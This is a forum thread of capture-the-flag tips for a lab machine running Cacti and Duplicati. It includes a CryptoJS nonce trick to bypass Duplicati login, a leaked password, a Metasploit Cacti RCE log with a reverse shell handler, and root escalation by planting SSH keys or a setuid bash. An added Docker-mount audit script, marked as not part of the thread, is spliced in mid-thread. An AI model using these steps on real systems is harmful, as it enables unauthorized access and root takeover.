Posts: 60
Threads: 18
Joined: Jul 2024
(Aug 25, 2024, 09:36 AM)rootme1122 Wrote: (Aug 25, 2024, 09:34 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 06:09 AM)humanai Wrote: (Aug 25, 2024, 04:38 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 04:34 AM)0x404 Wrote: It didn't work here either =\
console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));
This also did not work
This looks correct, make sure you use the correct nonce for your session
Everything was correct but it still did not work for me
same here Login failed: Unauthorized
yeah, I don't know why this is happening to me
Posts: 41
Threads: 1
Joined: Jun 2024
try using msf6 exploit(multi/http/cacti_package_import_rce) and linux/local/su_login in metasploit. it will work
Posts: 42
Threads: 2
Joined: Aug 2024
If anyone still struggles with the bypass for duplicati, here is the Password:
MonitorsThreeDuplicatiBackupPassword2024
For Priv-Esc (not just the root-flag, but shell as root):
Enable run-script-before on settings and set its Path to:
Duplicati is running in docker, and / is mounted on /source
Create /tmp/script.sh and put in your method of escalation (either a reverse shell, or writing an ssh-key to /root/.ssh/authorized_keys) or simply chmod +s on /usr/bin/bash
afterwards run the cacti-backup on "Home" --> "run now"
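An added example, not part of any post in this thread: a defender-side check for the condition the post above describes, a container with the host's / bind-mounted, which is what lets a backup service inside it read and overwrite any host file. It parses `docker inspect` JSON; the sample data, the container name and the `SENSITIVE` list are constructed assumptions.

```python
import json

# Constructed sample in the shape of `docker inspect <container>` output;
# the container name and mounts are illustrative, not taken from the thread.
SAMPLE_INSPECT = json.dumps([{
    "Name": "/duplicati",
    "Mounts": [
        {"Type": "bind", "Source": "/", "Destination": "/source", "RW": True},
        {"Type": "bind", "Source": "/opt/duplicati/config",
         "Destination": "/config", "RW": True},
        {"Type": "volume", "Source": "/var/lib/docker/volumes/x/_data",
         "Destination": "/data", "RW": True},
    ],
}])

# Host paths whose exposure lets a container service read or replace
# credentials and system files (assumed list; extend for your hosts).
SENSITIVE = ("/root", "/etc", "/home", "/var/run/docker.sock")


def exposed_paths(source):
    """Sensitive host paths reachable through a bind mount of `source`."""
    src = source.rstrip("/") or "/"
    hits = []
    for p in SENSITIVE:
        covers = src == "/" or p == src or p.startswith(src + "/")
        inside = src.startswith(p + "/")  # mount is a subdirectory of p
        if covers or inside:
            hits.append(p)
    return hits


def audit(inspect_json):
    """Return one finding per bind mount that exposes a sensitive host path."""
    findings = []
    for container in json.loads(inspect_json):
        for m in container.get("Mounts", []):
            if m.get("Type") != "bind":
                continue  # named volumes do not map arbitrary host paths
            hits = exposed_paths(m["Source"])
            if hits:
                findings.append({
                    "container": container.get("Name", "?").lstrip("/"),
                    "source": m["Source"],
                    "destination": m["Destination"],
                    "writable": bool(m.get("RW")),
                    "exposes": hits,
                    # A writable mount allows file replacement, not just reads.
                    "severity": "high" if m.get("RW") else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_INSPECT):
        print(finding)
```

Feed it real data with `docker inspect $(docker ps -q)`; a finding on a backup or monitoring container is a reason to narrow the mount to the directories it actually needs and make it read-only where restores are not required.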
Posts: 3
Threads: 0
Joined: Jul 2024
for anyone wondering... I went from www-data to capturing root flag with no priv-esc in between.
once you have www-data shell, just chisel 8200, bypass duplicati auth with the medium guide, and create a backup for /sources/home/ and /sources/root.
the generated aes.zip files contain all files and folders for marcus and root. use sharpaescrypt to decrypt
Posts: 32
Threads: 1
Joined: Aug 2024
i think it should be clear what to do. But if you need details i did it like that:
on my kali: ssh-keygen -t rsa -b 4096 -f monitors
copy monitors.pub as authorized_keys to /home/marcus
in duplicati new backup - name for example TEST
destination to /source/tmp/test1
disable encrypting
source to /source/home/marcus/authorized_keys
disable automate backup
save and run backup
then restore from TEST
choose authorized_keys
destination choose /source/root/.ssh/
choose overwrite
run
I am confused on the part
then restore from TEST
choose authorized_keys
can this be explained?
I have created the backup , my key is in /home/marcus
Posts: 26
Threads: 0
Joined: May 2024
(Aug 25, 2024, 08:58 AM)aasdawejkasjdkasd Wrote: Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt
So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.
I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root
(Aug 25, 2024, 08:57 AM)Eggsy Wrote: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).
anyone can help me with this?
Missing -i before id_rsa
bro just su marcus inside the www/data
Posts: 49
Threads: 1
Joined: Jun 2024
Aug 25, 2024, 10:51 AM
(This post was last modified: Aug 25, 2024, 10:51 AM by bmoon10.)
(Aug 25, 2024, 09:36 AM)rootme1122 Wrote: (Aug 25, 2024, 09:34 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 06:09 AM)humanai Wrote: (Aug 25, 2024, 04:38 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 04:34 AM)0x404 Wrote: It didn't work here either =\
console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));
This also did not work
This looks correct, make sure you use the correct nonce for your session
Everything was correct but it still did not work for me
same here Login failed: Unauthorized
if you've followed these steps so far then before pasting the console.log password into burp password request intercept window do url encode the password
for e.g
console.log output will be something like this.
uTQDw/x0nVjb5aAyVcv0vdtGpCJ8Nmxxxxxxxxxxxx=
url encoded version
uTQDw%2Fx0nVjb5aAyxxxxxxxxxxCJ8NmRQXZEWda2p8LM%3D
this will help you with the login page
Posts: 5
Threads: 0
Joined: Aug 2024
(Aug 25, 2024, 08:35 AM)jsvensson Wrote: (Aug 25, 2024, 07:58 AM)test888 Wrote: (Aug 25, 2024, 07:48 AM)jsvensson Wrote: for those who have trouble bypassing duplicati authentication
in burp you do intercept send login do forward copy session_nonce to noncedpwd command - substitute result to password - forward and then disable intercept
for getting shell as root:
generate ssh keys on your box - copy public key to some folder on box as authorized_keys, in duplicati create backup to backup this file and then restore it to /source/root/.ssh/ - now you should be able login with generated key as root
What are your steps to create the backup?
i think it should be clear what to do. But if you need details i did it like that:
on my kali: ssh-keygen -t rsa -b 4096 -f monitors
copy monitors.pub as authorized_keys to /home/marcus
in duplicati new backup - name for example TEST
destination to /source/tmp/test1
disable encrypting
source to /source/home/marcus/authorized_keys
disable automate backup
save and run backup
then restore from TEST
choose authorized_keys
destination choose /source/root/.ssh/
choose overwrite
run
then just do ssh root@ip -i file_with_key
(Aug 25, 2024, 08:31 AM)teky Wrote: this nonce shit is so frustrating
it's rather easy just do it with steps:
1. intercept in burp
2. login with some pass
3. forward login
4. copy session-nonce and decode it from url
5. put it in var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("your_nonce") + saltedpwd)).toString(CryptoJS.enc.Base64);
6. copy noncedpwd to password in intercepted request
7. forward
8. stop intercepting
you should be logged
I'm glad to hear I was on the right track here earlier but this still wasn't working for me earlier... when I try to execute in browser to get the pass it simply states saltpwd isn't defined.
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("9CZs1OZ3xYWKnue71Qr3FYaxqc......") + saltedpwd)).toString(CryptoJS.enc.Base64);
Uncaught ReferenceError: saltedpwd is not defined
<anonymous>
Posts: 2
Threads: 1
Joined: Jul 2024
msf6 exploit(multi/http/cacti_package_import_rce) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[-] Exploit aborted due to failure: unreachable: Could not connect to the web server - no response when sending the preview import request
[*] Exploit completed, but no session was created.
I get this error... Can somebody help me?
Posts: 16
Threads: 0
Joined: Jul 2024
(Aug 24, 2024, 10:49 PM)drunkp Wrote: hexforce Wrote:
Found out that you can bypass auth since you have access to the duplicati db in /opt/duplicati ... I didn't manage to get the exploit to work yet, but could lead to user?
/opt/duplicati doesn't contain dbs
Yes it does you absolute twat